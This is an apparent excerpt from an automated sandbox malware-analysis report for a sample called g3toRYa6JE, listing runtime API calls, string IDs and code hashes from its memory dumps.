                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __cftoe
                                                                                                                                                                                                                              • String ID: <(@$<(@
                                                                                                                                                                                                                              • API String ID: 4189289331-1745028333
                                                                                                                                                                                                                              • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                              • Instruction ID: dd19a4b5401c40ac365bd4b6466f4abdac11a3aecfb9adebaa38ddcec4c103bf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18512C32A00111EBDB149B5BEC41EAB77ADEF49325F90415FF81592282DB39D900866D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044017F), ref: 0043EEB5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DecodePointer
                                                                                                                                                                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                              • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                              • Opcode ID: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
                                                                                                                                                                                                                              • Instruction ID: 29b0adf4cd4a19bf6d80e559d7e92663f8e6ec8767138eee3bf00a563bc4ae44
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4851A07090150ADBCF14DFA9E9481AEBBB0FB0D300F2551A7D480A62A5C7B99D29CB1E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                                                                                                                                              • Instruction ID: ac0c8d1bba1f017832b802a283166f217690c0e83309bbad4efe33411024d77d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71C1E574E04349EFDB11DFA8D845BEEBBB4BF0A310F144199E415AB392D7389A81CB61
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D00
                                                                                                                                                                                                                              • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D19
                                                                                                                                                                                                                              • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D20
                                                                                                                                                                                                                              • PMDtoOffset.LIBCMT ref: 00428D3F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                              • String ID: Bad dynamic_cast!
                                                                                                                                                                                                                              • API String ID: 1467055271-2956939130
                                                                                                                                                                                                                              • Opcode ID: 6b652844560000745936e8dd829dcd732162928c29c706bfbf939b01ea652829
                                                                                                                                                                                                                              • Instruction ID: f58e39392761fe45c588d51cd7f0347041c183eb1b6093b38bd943e8a3a40f23
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b652844560000745936e8dd829dcd732162928c29c706bfbf939b01ea652829
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16214972B022259FDB04DF65FD02AAE77A4EF54714B50411FF900932C1DF38E90586A9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00404C1B
                                                                                                                                                                                                                              • int.LIBCPMT ref: 00404C32
                                                                                                                                                                                                                                • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                                                                                                                                                • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 00404C3B
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00404C6C
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C82
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CA0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID: 8v
                                                                                                                                                                                                                              • API String ID: 2243866535-3181183610
                                                                                                                                                                                                                              • Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                                                                                                                                              • Instruction ID: 4433383583620685c096cb23b62731a72f637e788ffb24460987deb82302b81b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE11C671D001249BCB14EBA0C845AED77B4AF54315F20003EE911B72D2DB7C9D04CB9C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00784E82
                                                                                                                                                                                                                              • int.LIBCPMT ref: 00784E99
                                                                                                                                                                                                                                • Part of subcall function 0078BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0078BFCA
                                                                                                                                                                                                                                • Part of subcall function 0078BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0078BFE4
                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 00784EA2
                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00784ED3
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00784EE9
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00784F07
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                              • String ID: 8v
                                                                                                                                                                                                                              • API String ID: 2243866535-3181183610
                                                                                                                                                                                                                              • Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                                                                                                                                              • Instruction ID: 79f73224f5d85d6b7138b1ac1d72007deb116dca57bb3ba83000fe8332ac1a3e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57118E31980219DBCB21FFA4D849AED77B4BF44711F240519F511AB292DB7C9A04CBA5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • atomic_compare_exchange.LIBCONCRT ref: 0079C6CC
                                                                                                                                                                                                                              • atomic_compare_exchange.LIBCONCRT ref: 0079C6F0
                                                                                                                                                                                                                              • std::_Cnd_initX.LIBCPMT ref: 0079C701
                                                                                                                                                                                                                              • std::_Cnd_initX.LIBCPMT ref: 0079C70F
                                                                                                                                                                                                                                • Part of subcall function 00781370: __Mtx_unlock.LIBCPMT ref: 00781377
                                                                                                                                                                                                                              • std::_Cnd_initX.LIBCPMT ref: 0079C71F
                                                                                                                                                                                                                                • Part of subcall function 0079C3DF: __Cnd_broadcast.LIBCPMT ref: 0079C3E6
                                                                                                                                                                                                                              • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0079C72D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                                                                                                                                                              • String ID: d#D
                                                                                                                                                                                                                              • API String ID: 4258476935-2139572230
                                                                                                                                                                                                                              • Opcode ID: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
                                                                                                                                                                                                                              • Instruction ID: 8e4d8bff6095f739f4c5384b3aaea93497a3758e5e8eecf2404b11231fcd911c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D01F271900601EBCF25B7A0AD8EB9DB36DBF01310F104010F90197682EB7CEB058BD2
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D928,0042D928,?,?,?,00432375,00000001,00000001,23E85006), ref: 0043217E
                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 004321B6
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432375,00000001,00000001,23E85006,?,?,?), ref: 00432204
                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0043229B
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004322FE
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0043230B
                                                                                                                                                                                                                                • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00432314
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00432339
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3864826663-0
                                                                                                                                                                                                                              • Opcode ID: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
                                                                                                                                                                                                                              • Instruction ID: ba832ad7ebe863b589d8a86c2aeb799e0d63014e0688505fe86a97fbdbb1aa79
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA51F572600216AFDB249F71DD41EAF77A9EB48754F14462AFD04E7240DBBCDC408668
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 007B2131: GetLastError.KERNEL32(?,?,007AA9DC,?,00000000,?,007ACDD6,00782474,00000000,?,00451F20), ref: 007B2135
                                                                                                                                                                                                                                • Part of subcall function 007B2131: _free.LIBCMT ref: 007B2168
                                                                                                                                                                                                                                • Part of subcall function 007B2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 007B21A9
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B1434
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B144D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B147F
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B1488
                                                                                                                                                                                                                              • _free.LIBCMT ref: 007B1494
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorLast
                                                                                                                                                                                                                              • String ID: C
                                                                                                                                                                                                                              • API String ID: 3291180501-1037565863
                                                                                                                                                                                                                              • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                              • Instruction ID: e77fdddd6bfca1b413f2f76832d4a06b01f0bf955098daae56f72cc6eafd47c5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37B11875A01219DFDB24DF18C898BEDB7B4FB48304F9485AAE909A7351E735AE90CF40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                              • Instruction ID: 375e79c53d3bcaca8bdb11d34ea16f93cbcffeb35ab56cd023e7f34feda17694
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2361F271D00205AFEB20DF69C842B9ABBF4EF0D710F14516BE888EB382E7759D418B59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                              • Instruction ID: c0f8bc8a41506c0eae3b276e6fc4f84c2c8aaf7f533789eb0d8a7c2aa6be44a3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D619071D00205FFDB20EF68C842BEABBF4FB45720F14416AE944EB252E779AD419B51
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(?,0042C22D,E0830C40,?,?,?,?,?,?,00433FE8,0040DDCB,0042C22D,?,0042C22D,0042C22D,0040DDCB), ref: 004338B5
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00433930
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 0043394B
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,0042C22D,00000001,?,00000005,00000000,00000000), ref: 00433971
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 00433990
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,0040DDCB,00000001,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 004339C9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                              • Opcode ID: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
                                                                                                                                                                                                                              • Instruction ID: 0fd517cfdcf2aa173ba8fdea846c20396cfd97c89b6f08fd2475e7b61059f896
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7751C470E002099FCB20DFA8D845BEEBBF4EF09701F14412BE556E7291E774AA41CB69
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(?,007AC494,E0830C40,?,?,?,?,?,?,007B424F,0078E032,007AC494,?,007AC494,007AC494,0078E032), ref: 007B3B1C
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 007B3B97
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 007B3BB2
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,007AC494,00000001,?,00000005,00000000,00000000), ref: 007B3BD8
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,007B424F,00000000,?,?,?,?,?,?,?,?,?,007B424F,0078E032), ref: 007B3BF7
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,0078E032,00000001,007B424F,00000000,?,?,?,?,?,?,?,?,?,007B424F,0078E032), ref: 007B3C30
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                              • Opcode ID: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
                                                                                                                                                                                                                              • Instruction ID: 5f23d053cfaa7edfc635c0524f805b4a4616e35ae4dd6ea85bb92686f0920966
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9751B6B5900249EFCB10CFA8D885BEEBBF4EF09701F14412AE955F7291E7349A81CB65
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 004286EB
                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 004286F3
                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00428781
                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 004287AC
                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00428801
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                              • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                              • Instruction ID: 6873744b8b7164bb1b3b36c6b2f168add7434ae9e481f0ca892fbce792e2aca1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C411934B012289BCF10DF29DC45A9F7BB0AF80328F64815FE8145B392DB399D15CB99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 007A4ABD
                                                                                                                                                                                                                                • Part of subcall function 007A4D8C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,007A47F0), ref: 007A4D9C
                                                                                                                                                                                                                              • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 007A4AD2
                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 007A4AE1
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 007A4AEF
                                                                                                                                                                                                                              • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 007A4B65
                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 007A4BA5
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 007A4BB3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3151764488-0
                                                                                                                                                                                                                              • Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                                                                                                                                              • Instruction ID: 039621146d90642d7da3db076e85b7cc38efacfa05610287e5ea3e5b7b9218f8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E131EA35A00214DFCF04EF64C885A6DB7B9FFC6310F244665E915A7382DBB9ED018794
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                              • Instruction ID: 6d10875eadbb656c302b38412db81507454656e5ad58498e79d080ea23809695
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54110D72A04215BFDB202FB79C05F6B7A5CEF89725F20163BF815C7241DA38890587A9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                                                                                                                                              • Instruction ID: 4c2cdbe284a0e608e0cbd68b8d15ab8604f7c65d14a4a3cd0a09b499f97f46e1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1118172605119FFDB202F769C09AAB7FACEFC2F21B100635F815D7251DA388980D6B1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0043A0BA: _free.LIBCMT ref: 0043A0E3
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A3C1
                                                                                                                                                                                                                                • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                                                                                                                                                • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A3CC
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A3D7
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A42B
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A436
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A441
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043A44C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
